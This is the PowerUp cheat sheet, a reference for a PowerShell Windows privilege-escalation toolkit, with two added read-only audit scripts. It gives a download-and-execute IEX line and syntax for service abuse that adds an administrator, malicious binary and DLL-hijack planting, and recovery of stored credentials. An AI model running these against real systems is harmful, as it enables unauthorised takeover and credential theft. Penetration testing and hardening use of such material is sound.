PowerUp
Cheat Sheet

Getting Started
Note: PowerUp's bleeding edge will always be in the development branch of PowerSploit.
Get PowerUp: [Link]
Load from disk: 1) C:\> powershell -exec bypass 2) PS C:\> Import-Module PowerUp.ps1
Load from GitHub: PS C:\> IEX (New-Object [Link]).DownloadString("[Link]")
Load in Cobalt Strike's Beacon: beacon> powershell-import /local/path/to/PowerUp.ps1, then beacon> powershell Invoke-AllChecks
Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]
Most PowerUp functions are implemented in Empire in privesc/powerup/*
Invoke-AllChecks will run all current privilege escalation checks detailed in this guide and will output the appropriate abuse function syntax for anything found. The -HTMLReport flag will write out an HTML version of the report to [Link].

Enumerating Service Vulnerabilities
Get-ModifiableService: Enumerates all services where the current user can modify the service binPath.
Get-ModifiableServiceFile: Enumerates all services where the current user can write to the associated service binary or its arguments.
Get-ServiceUnquoted: Enumerates all services with unquoted binary paths.

Weaponizing Service Vulnerabilities
Invoke-ServiceAbuse abuses a vulnerable service's binPath to execute commands as SYSTEM.
Install-ServiceBinary installs a malicious C# binary for a specified service.
Both cmdlets accept the following parameters (as well as accepting a service name/service object from Get-Service on the pipeline):
  -Name SERVICE              Service name to abuse.
  -UserName [DOMAIN\]USER    The username to add (defaults to john). Domain users are not created, only added to the LocalGroup.
  -Password P@55Word         The password for the added user (defaults to Password123!).
  -LocalGroup NAME           The group to add the user to (default: Administrators).
  -Command net               Custom command to execute.
Install-ServiceBinary backs up the original service path to \orig_path.[Link]. Restore-ServiceBinary will restore this backup binary to its original path.
Set-ServiceBinPath can set a service's binPath without calling [Link].

Registry Checks
Get-RegistryAlwaysInstallElevated: Checks if the "AlwaysInstallElevated" key is set. This means that MSI installation packages always run as SYSTEM.
Get-RegistryAutoLogon: Returns any autologon credentials from various registry locations.
Get-ModifiableRegistryAutoRun: Returns autoruns where the current user can modify the binary/script (or its config).
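As an added example (not PowerUp's own code), the following read-only check reports the two registry conditions above from a hardening perspective: the AlwaysInstallElevated policy, which only takes effect when the value is 1 under both HKLM and HKCU, and a Winlogon DefaultPassword, which is readable by any local user. The key paths are the standard Windows locations and are assumed here rather than taken from the sheet.

```powershell
# Added audit example, not PowerUp code. Read-only: it reports the two
# registry misconfigurations from the Registry Checks section so an
# administrator can confirm a host is clean or see which policy to fix.

function Test-AlwaysInstallElevated {
    # The MSI policy is only effective when BOTH the machine and the user
    # value are 1, so each hive is reported separately.
    $keys = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'   # assumed standard path
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'   # assumed standard path
    }
    $state = @{}
    foreach ($hive in $keys.Keys) {
        $value = Get-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = ($null -ne $value -and $value.AlwaysInstallElevated -eq 1)
    }
    [pscustomobject]@{
        Check      = 'AlwaysInstallElevated'
        HKLM       = $state['HKLM']
        HKCU       = $state['HKCU']
        Vulnerable = ($state['HKLM'] -and $state['HKCU'])
    }
}

function Test-AutoLogonCredential {
    # Winlogon autologon keeps DefaultPassword in cleartext; flag its
    # presence whether or not AutoAdminLogon is currently switched on.
    # The password value itself is deliberately not echoed.
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'   # assumed standard path
    $props = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
    $hasPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)
    [pscustomobject]@{
        Check           = 'AutoLogon'
        AutoAdminLogon  = ($props.AutoAdminLogon -eq '1')
        DefaultUserName = $props.DefaultUserName
        PasswordStored  = $hasPassword
        Vulnerable      = $hasPassword
    }
}

Test-AlwaysInstallElevated
Test-AutoLogonCredential
```

If the first check reports Vulnerable, set the "Always install with elevated privileges" policy to Disabled under both Computer Configuration and User Configuration; if the second does, clear DefaultPassword and use a managed autologon mechanism instead of a cleartext registry value.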
DLL Hijacking
Find-PathDLLHijack checks if the current %PATH% has any directories that are writeable by the current user. Weaponizable for Windows 7 with Write-HijackDll and FOLDER\PATH\[Link].
Write-HijackDll writes out a self-deleting .bat file to \hijackpath\[Link] that executes a command, and writes out a hijackable DLL that launches the .bat. It accepts the same -UserName/-Password/-Command arguments as Invoke-ServiceAbuse as well as:
  -DllPath PATH\[Link]       Path to write the hijack DLL.
  -Architecture [x64/x86]    Manual arch specification.
  -BatPath PATH\[Link]       Path of the .bat for the hijackable .dll to run.
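Get-ServiceUnquoted (under Enumerating Service Vulnerabilities) and Find-PathDLLHijack above both reduce to one question: can the current user write to a directory that Windows will search before the intended binary? The added example below is not PowerUp's code; it is an independent, read-only audit in the same spirit that a defender can run to verify a host is clean. It assumes Get-CimInstance is available (PowerShell 3 or later) and uses a simple Allow-ACE scan; Deny ACEs and ownership rules are not evaluated, so treat a "not writable" result as a first pass rather than proof.

```powershell
# Added audit example, not PowerUp code. Read-only: lists the directories an
# unquoted service path or %PATH% entry would make Windows search, and
# whether the current user holds a write ACE on any of them.

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    # Collect the user SID plus every group SID in the current token, then
    # look for an Allow ACE on the path that grants CreateFiles/AppendData
    # (Write, Modify and FullControl all include those bits).
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })
    $writeBits = [System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable identity, skip it
        if (($sids -contains $sid) -and (($ace.FileSystemRights -band $writeBits) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePathRisk {
    # For an unquoted path containing spaces, each space-separated prefix is
    # a name Windows may try first, so the directory holding that prefix is
    # the location that must not be writable by unprivileged users.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $pathName = $svc.PathName
        if (-not $pathName -or $pathName.StartsWith('"')) { return }
        $exeEnd = $pathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -lt 0) { return }
        $binPath = $pathName.Substring(0, $exeEnd + 4)   # drop any arguments
        if ($binPath -notmatch ' ') { return }
        $parts = $binPath.Split(' ')
        $searchDirs = @()
        for ($i = 1; $i -lt $parts.Length; $i++) {
            $prefix = $parts[0..($i - 1)] -join ' '
            $dir = Split-Path -Path $prefix -Parent
            if ($dir -and (Test-Path -LiteralPath $dir) -and ($searchDirs -notcontains $dir)) { $searchDirs += $dir }
        }
        foreach ($dir in $searchDirs) {
            [pscustomobject]@{
                Service      = $svc.Name
                BinPath      = $binPath
                SearchDir    = $dir
                WritableByMe = Test-WritableByCurrentUser -Path $dir
            }
        }
    }
}

function Get-WritablePathDirectory {
    # The same writability test applied to every %PATH% entry, which is what
    # a PATH DLL-hijack check comes down to.
    $env:PATH -split ';' | Where-Object { $_ } | ForEach-Object {
        $dir = $_.Trim()
        if (Test-Path -LiteralPath $dir) {
            [pscustomobject]@{ Directory = $dir; WritableByMe = Test-WritableByCurrentUser -Path $dir }
        }
    }
}

Get-UnquotedServicePathRisk | Where-Object WritableByMe
Get-WritablePathDirectory   | Where-Object WritableByMe
```

Anything returned by the two final pipelines is a finding to remediate: quote the service's ImagePath and remove write ACEs for non-administrator principals on the listed directory, and drop or lock down any %PATH% entry that standard users can write to.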
Miscellaneous Checks
Get-UnattendedInstallFile: Checks for leftover [Link] files.
Get-Webconfig: Recovers cleartext and encrypted connection strings from all [Link]. Credit to Scott Sutherland.
Get-ApplicationHost: Recovers encrypted application pool and virtual directory passwords from the [Link]. Credit to Scott Sutherland.
Get-SiteListPassword: Searches for any McAfee [Link] files and decrypts the contents.

Helpers
Get-ModifiablePath: Tokenizes a string and returns any files that the current user can modify.
Get-CurrentUserTokenGroupSid: Returns all SIDs that the current user is a part of, even if the SID is disabled.
Add-ServiceDacl: Adds a Dacl field to an object returned by Get-Service.

More Information
[Link]
[Link]

Version 1.1. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.